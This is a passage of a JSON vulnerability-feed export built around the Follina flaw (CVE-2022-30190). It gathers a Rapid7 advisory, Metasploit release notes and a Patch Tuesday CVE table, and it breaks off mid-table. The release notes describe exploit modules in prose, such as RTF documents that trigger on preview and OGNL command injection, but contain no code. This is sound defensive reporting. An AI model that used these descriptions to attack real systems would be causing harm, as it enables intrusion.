"HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T18:25:36", "type": "schneier", "title": "Clever \u2014 and Exploitable \u2014 Windows Zero-Day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T18:25:36", "id": "SCHNEIER:FECDA04283F9CFE2D14C1550420A1804", "href": "https://www.schneier.com/blog/archives/2022/06/clever-and-exploitable-windows-zero-day.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-06-02T16:48:36", "description": "\n\nOn May 30, 2022, Microsoft Security Response Center (MSRC) [published a blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on CVE-2022-30190, an unpatched vulnerability in the Microsoft Support Diagnostic Tool (msdt) in Windows. Microsoft\u2019s [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>) on CVE-2022-30190 indicates that exploitation has been detected in the wild.\n\nAccording to Microsoft, CVE-2022-30190 is a remote code execution vulnerability that exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights. Workarounds are available in [Microsoft\u2019s blog](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nRapid7\u2019s vulnerability research team has a [full technical analysis of CVE-2022-30190 in AttackerKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis?referrer=blog>). The flaw requires user interaction to exploit, looks similar to many other vulnerabilities that necessitate a user opening or previewing an attachment, and appears to leverage a vector [described in 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>). Despite the description, it is not a true \u201cremote code execution\u201d vulnerability.\n\n## Mitigation guidance\n\nIn the absence of a patch, disable the MSDT URL protocol [as specified in Microsoft\u2019s advisory](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-30190 with an authenticated vulnerability check in the May 31 content release.\n\nInsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability:\n\n * Suspicious Process - Microsoft Office App Spawns MSDT.exe\n\nWe recommend that you review your settings for this detection rule and confirm it is turned on and [set to an appropriate rule action and priority for your organization](<https://docs.rapid7.com/insightidr/modify-detection-rules>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T15:15:16", "type": "rapid7blog", "title": "CVE-2022-30190: \"Follina\" Microsoft Support Diagnostic Tool Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T15:15:16", "id": "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "href": "https://blog.rapid7.com/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>))and Windows CVE-2022-30190 ([AttackKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>)\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- : \nThis PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-13T15:56:19", "description": "## ICPR Certificate Management\n\n\n\nThis week Metasploit has a new ICPR Certificate Management module from [Oliver Lyak](<https://github.com/ly4k>) and our very own [Spencer McIntyre](<https://github.com/zeroSteiner>), which can be utilized for issuing certificates via Active Directory Certificate Services. It has the capability to issue certificates which is useful in a few contexts including persistence, [ESC1](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) and as a primitive necessary for exploiting [CVE-2022-26923](<https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html>). Resulting in the PFX certificate file being stored to loot and is encrypted using a blank password.\n\n## ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum\n\nAnother addition thanks to [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), that brings two new `auxiliary/gather` modules and docs that take advantage of default Xnode credentials ([CVE-2020\u201311532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532>)) in order to enumerate active directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at `lib/msf/core/auxiliary/manageengine_xnode` that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files to determine what data will be enumerated from Xnode. The [PR](<https://github.com/rapid7/metasploit-framework/pull/16725>) contains even more information on the vulnerable systems and extensive notes!\n\n## New module content (5)\n\n * [ICPR Certificate Management](<https://github.com/rapid7/metasploit-framework/pull/16939>) by [Oliver Lyak](<https://github.com/ly4k>) and [Spencer McIntyre](<https://github.com/zeroSteiner>) \\- This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.\n\n * [ManageEngine ADAudit Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [ManageEngine DataSecurity Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [Zyxel Firewall SUID Binary Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/16786>) by [jbaines-r7](<https://github.com/jbaines-r7>), which exploits [CVE-2022-30526](<https://attackerkb.com/topics/q8X8Km59iU/cve-2022-30526?referrer=blog>) \\- This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate themselves to root. The vulnerability is identified as CVE-2022-30526 and is due to a suid binary that allows any user to copy files with root permissions.\n\n * [CVE-2022-30190 AKA Follina](<https://github.com/rapid7/metasploit-framework/pull/16734>) by [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates the exploit for CVE-2022-30190 (A.K.A Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer's preview tab without needing user interaction to enable editing functionality.\n\n## Enhancements and features (4)\n\n * [#16746](<https://github.com/rapid7/metasploit-framework/pull/16746>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates the MSSQL login scanner to catch exceptions and continue running.\n\n * [#16900](<https://github.com/rapid7/metasploit-framework/pull/16900>) from [bcoles](<https://github.com/bcoles>) \\- This adds a new `#kill_process` method that supports shell, PowerShell, and Meterpreter sessions on different platforms.\n\n * [#16903](<https://github.com/rapid7/metasploit-framework/pull/16903>) from [bcoles](<https://github.com/bcoles>) \\- This cleans up the enum_shares post modules and adds support for shell sessions.\n\n * [#16959](<https://github.com/rapid7/metasploit-framework/pull/16959>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `time` command has been updated with the `--cpu` and `--memory` profiler options to allow users to get memory and CPU usage profiles when running a command inside `msfconsole`.\n\n## Bugs fixed (5)\n\n * [#16750](<https://github.com/rapid7/metasploit-framework/pull/16750>) from [bojanisc](<https://github.com/bojanisc>) \\- This updates the `exploit/multi/http/jenkins_script_console` module to use the decoder from the `java.util.Base64` class in place of the now-deprecated decoder from the `sun.misc.BASE64Decoder` class, enabling exploitation of newer Jenkins versions.\n\n * [#16869](<https://github.com/rapid7/metasploit-framework/pull/16869>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `file_remote_digestmd5()` and `file_remote_digestsha1()` methods where `read_file()` would return an error message instead of the remote file contents. Additionally, the `file_remote_digest*` methods now support more session types, and they have a new `util` option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.\n\n * [#16918](<https://github.com/rapid7/metasploit-framework/pull/16918>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. This would lead to multiple sessions being returned when only one was desired.\n\n * [#16920](<https://github.com/rapid7/metasploit-framework/pull/16920>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the `--arch` argument with `msfvenom`.\n\n * [#16955](<https://github.com/rapid7/metasploit-framework/pull/16955>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.2.14...6.2.15][prs-landed]\n * [Full diff 6.2.14...6.2.15][diff]\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo][repo](master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the\n\n[binary installers][binary](which also include the commercial edition). \n[binary]: <https://www.rapid7.com/products/metasploit/download.jsp> \n[diff]: <https://github.com/rapid7/metasploit-framework/compare/6.2.14...6.2.15> \n[prs-landed]: [https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00%22>) \n[nightly]: <https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers> \n[repo]: <https://github.com/rapid7/metasploit-framework>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-02T19:39:21", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11532", "CVE-2022-26923", "CVE-2022-30190", "CVE-2022-30333", "CVE-2022-30526"], "modified": "2022-09-02T19:39:21", "id": "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "href": "https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T00:04:15", "description": "\n\nIt's the week of [Hacker Summer Camp](<https://www.rapid7.com/blog/post/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/>) in Las Vegas, and Microsoft has [published](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>) fixes for 141 separate vulnerabilities in their swath of August updates. This is a new monthly record by raw CVE count, but from a patching perspective, the numbers are slightly less dire. 20 CVEs affect their Chromium-based Edge browser, and 34 affect Azure Site Recovery (up from 32 CVEs affecting that product last month). As usual, OS-level updates will address a lot of these, but note that some extra configuration is required to fully protect Exchange Server this month.\n\nThere is one 0-day being patched this month. [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713>) is a remote code execution (RCE) vulnerability affecting the Microsoft Windows Support Diagnostic Tool (MSDT) \u2013 it carries a CVSSv3 base score of 7.8, as it requires convincing a potential victim to open a malicious file. The advisory indicates that this CVE is a variant of the \u201cDogwalk\u201d vulnerability, which made news alongside [Follina](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>) (CVE-2022-30190) back in May.\n\nPublicly disclosed, but not (yet) exploited is [CVE-2022-30134](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30134>), an Information Disclosure vulnerability affecting Exchange Server. In this case, simply patching is not sufficient to protect against attackers being able to read targeted email messages. Administrators should [enable Extended Protection](<https://microsoft.github.io/CSS-Exchange/Security/Extended-Protection/>) in order to fully remediate this vulnerability, as well as [the](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21979>) [five](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21980>) [other](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24516>) [vulnerabilities](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24477>) [affecting](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34692>) Exchange this month. Details about how to accomplish this are available via the [Exchange Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\nMicrosoft also patched several flaws affecting Remote Access Server (RAS). The most severe of these ([CVE-2022-30133](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133>) and [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35744>)) are related to Windows Point-to-Point Tunneling Protocol and could allow RCE simply by sending a malicious connection request to a server. Seven CVEs affecting the Windows Secure Socket Tunneling Protocol (SSTP) on RAS were also fixed this month: six RCEs and one Denial of Service. If you have RAS in your environment but are unable to patch immediately, consider blocking traffic on port 1723 from your network.\n\nVulnerabilities affecting Windows Network File System (NFS) have been trending in recent months, and today sees Microsoft patching [CVE-2022-34715](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34715>) (RCE, CVSS 9.8) affecting NFSv4.1 on Windows Server 2022.\n\nThis is the worst of it. One last vulnerability to highlight: [CVE-2022-35797](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35797>) is a Security Feature Bypass in [Windows Hello](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/windows-hello-face-authentication#external-camera-security>) \u2013 Microsoft\u2019s biometric authentication mechanism for Windows 10. Successful exploitation requires physical access to a system, but would allow an attacker to bypass a facial recognition check.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-35802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35802>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-30175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30175>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30176>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34687>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35773](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35773>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35779](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35779>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35806>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35772](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35772>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-35824](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35824>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-33646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33646>) | Azure Batch Node Agent Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-35780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35780>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35781>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35799](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35799>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35775](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35775>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35801](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35801>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35807>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35808>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35782](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35782>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35809>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35784>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35810>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35811>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35785>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35786>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35813>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35788>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35814>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35789](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35789>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35815](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35815>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35790>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35816](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35816>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35817](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35817>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35791>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35818](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35818>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35819>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35776>) | Azure Site Recovery Denial of Service Vulnerability | No | No | 6.2 | Yes \n[CVE-2022-34685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34685>) | Azure RTOS GUIX Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes 